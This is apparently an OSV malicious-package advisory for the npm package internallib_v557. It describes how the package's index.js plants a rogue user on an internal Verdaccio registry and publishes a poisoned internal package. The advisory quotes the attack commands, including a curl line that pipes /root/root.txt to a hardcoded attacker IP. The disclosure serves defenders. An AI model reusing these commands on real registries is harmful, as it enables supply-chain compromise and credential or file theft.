MAL-2026-5678

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v557/MAL-2026-5678.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5678
Published
2026-06-11T21:57:47Z
Modified
2026-06-12T16:46:41.712995722Z
Summary
Malicious code in internallib_v557 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2)

index.js implements a multi-step attack against an internal npm registry. On invocation of the exported command(), it:

(1) creates a Verdaccio user pwn99/pwn99pass against http://0.0.0.0:4873/-/user/org.couchdb.user:pwn99 via curl PUT;
(2) queries the existing uhclabs_local_check package metadata;
(3) writes /tmp/pwn99/.npmrc containing a base64-encoded _auth for those credentials;
(4) npm publishes a malicious uhclabs_local_check@2.0.0 to http://0.0.0.0:4873/ whose package.json scripts.start is cat /root/root.txt | curl -s -d @- http://10.0.0.145:8888/rootflag; and
(5) at every step pipes output (user-create response, version listing, publish stdout/stderr, error output) to http://10.0.0.145:8888/step{1..n} via curl.

The downstream effect: any installer who later pulls uhclabs_local_check from the internal registry and runs its start script will exfiltrate the contents of /root/root.txt to the hardcoded attacker IP. The attacker also leaves a persistent publishing identity on the internal registry usable for future malicious releases of internal packages. This is a self-propagating namespace-takeover attack with a hardcoded C2 beacon and attacker-controlled persistence; there is no legitimate purpose consistent with the package's stated 'internal lib' scope.

Database specific
Affected packages

npm / internallib_v557

Package: npm / internallib_v557

Affected ranges: 1.*

Affected versions: 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.0.9, 1.0.10, 1.0.11, 1.0.12, 1.0.13, 1.0.14, 1.0.15, 1.0.16, 1.0.18, 1.0.19, 1.0.21, 1.0.22, 1.0.23, 1.0.24

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "c1a4eddedda9b48d93724f255d71cf4a8bf3bc3353436dd66cedc1a9d3d062c8",
            "tlsh": "c321110519b720351b7a24b59b7ba416b2438d23203cfa603acf97219fc06ac40bf6fc"
        }
    ],
    "package_integrity": [
        {
            "filename": "internallib_v557-1.0.10.tgz",
            "hashes": {
                "sha512_sri": "sha512-v1A2a2iSC5rrDtawvn1b+bLMFjm43uxbd15iewsIJZUyXfC72ElqplrugXqEOF7kfSm80VGirjxc8lLBQz5oxg==",
                "sha1": "fdaf438f4bda6323d60d6153ef43c51eb9930d96"
            }
        }
    ]
}